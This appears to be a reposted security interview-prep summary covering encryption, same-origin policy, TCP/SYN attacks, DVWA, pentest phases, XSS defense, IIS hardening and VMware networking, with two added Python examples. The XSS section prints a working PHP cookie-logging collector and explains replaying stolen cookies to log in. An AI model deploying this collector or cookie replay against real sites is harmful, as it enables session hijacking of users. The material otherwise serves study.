Network security, web security and penetration testing interview question summary (1)

Source: Internet
Author: User
Tags: ack, file copy, asymmetric encryption

What is the difference between symmetric and asymmetric encryption?

Symmetric encryption: the same key is used for encryption and decryption. Key management is complex (n(n-1)/2 keys for n users), the key is not suitable for transmission over the Internet, but encryption and decryption are fast. Used for encrypting data.
Asymmetric encryption: the private key cannot be derived from the public key, and each user needs only one key pair. The public key is suitable for transmission over the Internet, but encryption is slow. Used for digital signatures and encryption.

What is the same-origin policy?

To prevent different domains from interfering with each other in the user's browser, the browser isolates the content it receives from different origins (domains).
The browser does not let arbitrary scripts access a site's cookies; otherwise the session would be easy to hijack.
Only the site that set a cookie can access it, and only JavaScript that is included in, or loaded by, the pages returned by that site can access those cookies.

Where are cookies stored? Can you open them?

C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Cookies
Tools > Folder Options > View, uncheck "Hide protected operating system files", and the Cookies folder becomes visible.

How does XSS steal cookies?

Attacker code:
<?php

$cookie = $_GET['cookie'];
$time = date('Y-m-d g:i:s');
$referer = getenv('HTTP_REFERER');
$cookietxt = fopen('cookie.txt', 'a');
fwrite($cookietxt, "Time: " . $time . " Cookie: " . $cookie . " Referer: " . $referer . "\n"); // watch the double quotes, this line is error-prone
fclose($cookietxt);

?>

Script side:
<script>
document.write (' ');
</script>

After obtaining a cookie, use Firebug to find the site's cookies and create a new one:
add a cookie with the stolen value, submit the request with the Referer set, and you are logged in without entering the account password!

What are the differences between TCP and UDP, what is the TCP three-way handshake, and what is a SYN attack?

See also http://www.cnblogs.com/bizhu/archive/2012/05/12/2497493.html

1. Differences between TCP and UDP (reposted)
Advantages of TCP:

Reliable and stable.
TCP's reliability is reflected in the three-way handshake that establishes a connection before data is passed; in the acknowledgment, window, retransmission and congestion-control mechanisms during transfer; and in the connection teardown after the data has been transmitted, which frees system resources.
Disadvantages of TCP:

Slow, inefficient, heavy on system resources, vulnerable to attack.
TCP must establish a connection before passing data, which takes time; during transfer the acknowledgment, retransmission and congestion-control mechanisms consume further time; and every transport connection must be maintained on each device, so each connection occupies CPU, memory and other hardware resources.
Moreover, because TCP has acknowledgment and three-way handshake mechanisms, it is easy to exploit for DoS, DDoS, CC and similar attacks.
Advantages of UDP:
Faster, slightly safer than TCP.
UDP has no handshake, acknowledgment, window, retransmission or congestion-control mechanism; it is a stateless transport protocol, so it is very fast when passing data. Without TCP's mechanisms, UDP is less exploitable by attackers than TCP, but it cannot avoid attacks altogether, for example UDP flood attacks.
Disadvantages of UDP:

Unreliable, unstable.
Because UDP lacks TCP's reliability mechanisms, packets are easily lost when the network quality is poor.
Based on the pros and cons above:

When to use TCP:
When the quality of network communication matters, for example when all the data must reach the other side intact. This is the case for reliable applications such as HTTP, HTTPS and FTP (file transfer protocols) and POP and SMTP (mail transfer protocols).
Common everyday uses of TCP:

Browsers, using HTTP
FlashFXP, using FTP
Outlook, using POP and SMTP
PuTTY, using Telnet and SSH
QQ file transfer
............
When to use UDP:
When the requirements on communication quality are low but the communication should be as fast as possible.
Common everyday uses of UDP:

QQ voice
QQ video
TFTP


2. TCP handshake protocol
In the TCP/IP protocol suite, TCP provides a reliable connection service and uses a three-way handshake to establish a connection.
First handshake: when establishing a connection, the client sends a SYN packet (SYN=J) to the server and enters the SYN_SENT state, waiting for the server's confirmation.
Second handshake: the server receives the SYN packet and must acknowledge the client's SYN (ACK=J+1) while also sending its own SYN packet (SYN=K),
that is, a SYN+ACK packet; the server then enters the SYN_RECV state.
Third handshake: the client receives the server's SYN+ACK packet and sends an acknowledgment packet (ACK=K+1) to the server. Once this packet is sent,
the client and server enter the ESTABLISHED state and the three-way handshake is complete.

After the three-way handshake the client and server begin transmitting data. Some important concepts in the process above:
Half-open connection queue: in the three-way handshake, the server maintains a half-open connection queue with an entry for every client SYN packet (SYN=J).
An entry indicates that the server has received the SYN, has sent its acknowledgment to the client, and is waiting for the client's acknowledgment packet. The connections identified by these entries are in the server's SYN_RECV state.
When the server receives the client's acknowledgment packet, the entry is deleted and the connection enters the ESTABLISHED state. Backlog parameter: the maximum number of entries in the half-open connection queue.
SYN-ACK retransmission: after the server sends a SYN-ACK packet, if it does not receive the client's acknowledgment it retransmits for the first time; if after waiting a further period it still has not received the acknowledgment,
it retransmits a second time. If the number of retransmissions exceeds the maximum configured by the system, the system removes the connection's information from the half-open queue. Note that the waiting time before each retransmission is not necessarily the same.
Half-open connection lifetime: the maximum time an entry in the half-open queue survives, that is, the maximum time from the server receiving a SYN packet until it treats the handshake as invalid.
This value is the sum of the maximum waiting times of all retransmitted request packets. The half-open lifetime is sometimes also called the timeout, or the SYN_RECV lifetime.


3. SYN attack principle
A SYN attack is a DoS attack that exploits a flaw in the TCP protocol: by sending a large number of half-open connection requests it consumes the target's CPU and memory resources.
Besides hosts, SYN attacks can also harm routers, firewalls and other network systems; in fact a SYN attack does not care what the target system is,
as long as it has a TCP service open. As seen above, when the server receives a connection request (SYN=J),
it adds the information to the half-open queue, sends the reply packet (SYN=K, ACK=J+1) to the client, and enters the SYN_RECV state.
If the server does not receive the client's acknowledgment packet, it keeps retransmitting the request packet until the timeout, and only then removes the entry from the half-open queue.
Combined with IP spoofing, a SYN attack is very effective: typically the client forges a large number of non-existent IP addresses in a short time
and sends SYN packets to the server continuously. The server replies with acknowledgment packets and waits for the clients' confirmation, but because the source addresses do not exist,
it has to keep retransmitting until timeout. These forged SYN packets occupy the half-open queue for a long time, normal SYN requests are discarded,
the target system runs slowly, and in severe cases network congestion or even system paralysis results.
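To make the half-open queue, backlog and half-open lifetime concepts from sections 2 and 3 concrete, here is an added Python model (example code, not from the original post) of the server's SYN_RECV queue. The retransmission schedule, backlog size and all addresses are constructed assumptions; the model only shows why entries that are never acknowledged crowd out a legitimate client until they time out.

```python
# Assumed SYN-ACK retransmission waits in seconds; the lifetime of an entry is their sum.
RETRANSMIT_WAITS = [1, 2, 4, 8, 16, 32]


def half_open_lifetime(waits=RETRANSMIT_WAITS):
    """Lifetime of a half-open entry: the sum of all SYN-ACK retransmission waits."""
    return sum(waits)


class HalfOpenQueue:
    """The server's half-open (SYN_RECV) queue, bounded by the backlog parameter."""

    def __init__(self, backlog, waits=RETRANSMIT_WAITS):
        self.backlog = backlog
        self.lifetime = half_open_lifetime(waits)
        self.entries = {}      # (client_ip, client_port) -> time the entry expires
        self.dropped = 0       # SYNs discarded because the queue was full
        self.established = 0   # handshakes completed by a matching ACK

    def _expire(self, now):
        # Entries whose retransmissions are exhausted leave the queue (timeout).
        for key in [k for k, exp in self.entries.items() if exp <= now]:
            del self.entries[key]

    def on_syn(self, now, client):
        """First handshake arrives; returns True if a SYN_RECV entry was created."""
        self._expire(now)
        if len(self.entries) >= self.backlog:
            self.dropped += 1          # queue full: the SYN is discarded
            return False
        self.entries[client] = now + self.lifetime
        return True

    def on_ack(self, now, client):
        """Third handshake arrives; returns True if it completed a pending entry."""
        self._expire(now)
        if client in self.entries:
            del self.entries[client]
            self.established += 1
            return True
        return False                   # no matching SYN_RECV entry


def simulate_flood(backlog=128, spoofed_syns=128):
    """Fill the queue with SYNs from constructed, non-existent sources that never ACK,
    then observe one legitimate client before and after those entries expire."""
    q = HalfOpenQueue(backlog)
    for i in range(spoofed_syns):
        # Constructed sources in 10.0.0.0/8 that will never answer the SYN-ACK.
        q.on_syn(now=0, client=("10.0.%d.%d" % (i // 256, i % 256), 40000 + i))
    legit = ("192.0.2.10", 51515)                           # constructed legitimate client
    during = q.on_syn(now=1, client=legit)                  # queue is full: dropped
    after = q.on_syn(now=q.lifetime + 1, client=legit)      # spoofed entries timed out
    completed = q.on_ack(now=q.lifetime + 2, client=legit)  # third handshake succeeds
    return {
        "legit_during_flood": during,
        "legit_after_expiry": after,
        "handshake_completed": completed,
        "dropped": q.dropped,
        "half_open_now": len(q.entries),
    }


if __name__ == "__main__":
    print("half-open lifetime:", half_open_lifetime(), "s")
    print(simulate_flood())
```

The model shows the two quantities a defender watches: the number of SYN_RECV entries relative to the backlog, and how long each entry lives (the sum of the retransmission waits), which is exactly the window during which forged SYNs hold the queue.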


Which certifications should you take?

International first-choice information security certification: CISSP
Domestic information security certification: CISAW
Domestic information security certification: CISP
Rising hands-on information security technology certification: Security+
Essential certification for IT auditors: CISA


How is DVWA set up?

Start Apache and MySQL in XAMPP (XAMPP, Apache + MySQL + PHP + Perl, is a powerful integrated web-server package).
Place DVWA in the htdocs directory under XAMPP.
Enter http://127.0.0.1/DVWA in the browser and it is ready to use.
Also, OWASP's vulnerable practice platform: https://sourceforge.net/projects/owaspbwa/files/

What is the penetration testing process?

Overview of the penetration testing process:
pre-engagement interaction, intelligence gathering, threat modeling, vulnerability analysis,
exploitation, post-exploitation (how to keep control and maintain access), and reporting.

Before the attack: network footprinting, network scanning, network enumeration
During the attack: use the gathered information to exploit and obtain privileges
After the attack: post-exploitation persistence, file copying, Trojan implantation, trace removal


How to defend against XSS

1. Filter and encode front-end input:
for example, allow only characters of the specified type, such as a phone-number format or restrictions on registration user names. The input check must be done on the server side; front-end restrictions are easy to bypass.
Filter and escape special characters.
2. Filter and encode the output: encode and escape variable values when they are written into front-end HTML.
3. Use HttpOnly for important cookies.
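The three defenses above, written out as an added Python example (not the author's code): server-side allow-list validation, output encoding at the point where text enters HTML, and a session cookie marked HttpOnly so that script in the page cannot read it even if an injection gets through. The field names, patterns, the Secure flag (assumed HTTPS) and the sample payload are constructed assumptions.

```python
import html
import re
from http.cookies import SimpleCookie

# Step 1: allow-list validation, done on the server, never only in the browser.
# The field names and patterns are constructed assumptions for this example.
ALLOWED = {
    "phone": re.compile(r"^\+?[0-9]{6,15}$"),
    "username": re.compile(r"^[A-Za-z0-9_]{3,20}$"),
}


def validate_input(field, value):
    """Return True only if value matches the allow-list pattern for this field."""
    pattern = ALLOWED.get(field)
    return bool(pattern and pattern.fullmatch(value))


# Step 2: encode on output. Free text that must be accepted (a comment, say) is
# escaped at the moment it is written into HTML, not trusted from storage.
def render_comment(text):
    """Escape <, >, &, " and ' so user text cannot break out of the element."""
    return "<p>" + html.escape(text, quote=True) + "</p>"


# Step 3: mark the session cookie HttpOnly so document.cookie cannot read it.
# Secure is added on the assumption that the site is served over HTTPS.
def session_cookie_header(session_id, secure=True):
    """Build the Set-Cookie header line for the session cookie."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = secure
    jar["session"]["path"] = "/"
    return jar.output()  # "Set-Cookie: session=...; HttpOnly; Path=/; Secure"


if __name__ == "__main__":
    # Constructed payload of the kind an XSS test would submit.
    payload = "<script>alert(1)</script>"
    print("username accepted:", validate_input("username", payload))  # False
    print("rendered safely:", render_comment(payload))
    print(session_cookie_header("constructed-session-id"))
```

With step 3 in place, the cookie-stealing script shown earlier on this page gets an empty `document.cookie` for the session cookie, which is why the page lists HttpOnly alongside input and output filtering rather than instead of them.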


What protection should an IIS server have?

Compiled from: http://www.williamlong.info/archives/118.html
1. Keep Windows updated
2. Use an IIS protection tool
3. Remove the Default Web Site
4. If FTP and SMTP services are not needed, uninstall them
5. Check the administrators group and the services regularly
6. Strictly control write access on the server
7. Set complex passwords
8. Reduce or remove shares on the web server
9. Disable NetBIOS over TCP/IP
10. Use TCP port filtering
11. Double-check *.bat and *.exe files: search for *.bat once a week
12. Manage IIS directory security
13. Use NTFS security
14. Manage user accounts
15. Audit the web server


Virtual machine network connection modes and how they work

Compiled from: http://blog.csdn.net/shuxiao9058/article/details/7051463

After VMware is installed, two virtual network adapters, VMnet1 and VMnet8, are installed by default; the others are not (they can, of course, be installed manually). VMnet1 is the host-only adapter,
used for connections in host-only mode. VMnet8 is the NAT adapter, used for NAT connections. Their IP addresses are generated randomly, and if you experiment with virtual machines a lot,
it is best to fix the IP addresses of VMnet1 through VMnet8. By convention the network segments of the VMware virtual adapters are "fixed" as follows: VMnet1 uses the segment 192.168.10.0,
VMnet2 uses 192.168.20.0, and so on. For ordinary use you can simply leave them unchanged and go online.

The main VMware network connection modes are: bridged, NAT, and host-only.

1. Bridged networking

Description: uses the VMnet0 virtual switch; the virtual machine is equivalent to an independent computer on the network and has its own separate IP address.
As shown in network topology 1, in bridged mode A, A1, A2 and B can all reach each other.

Figure 1
2. Network address translation (NAT)

Description: uses the VMnet8 virtual switch; the virtual machine can reach other workstations on the host's network one-way, through the host, but other workstations cannot reach the virtual machine.
As shown in network topology 2, with NAT, A1 and A2 can access B, but B cannot access A1 or A2. A, A1 and A2 can all access each other.

Figure 2
3. Host-only networking

Description: uses the VMnet1 virtual switch; the virtual machine can only communicate with other virtual machines and the host, that is, it cannot reach the Internet. As shown in network topology 3,
in host-only mode A, A1 and A2 can access each other, but A1 and A2 cannot access B, nor can B access them.

Figure 3

With a cookie obtained through XSS, can you always log in without a username and password?

Basically, yes. Because the cookie value is handed to the browser, the browser sends the cookie when it accesses the page, and if the cookie is still valid you get straight in.

If there are errors, please point them out!
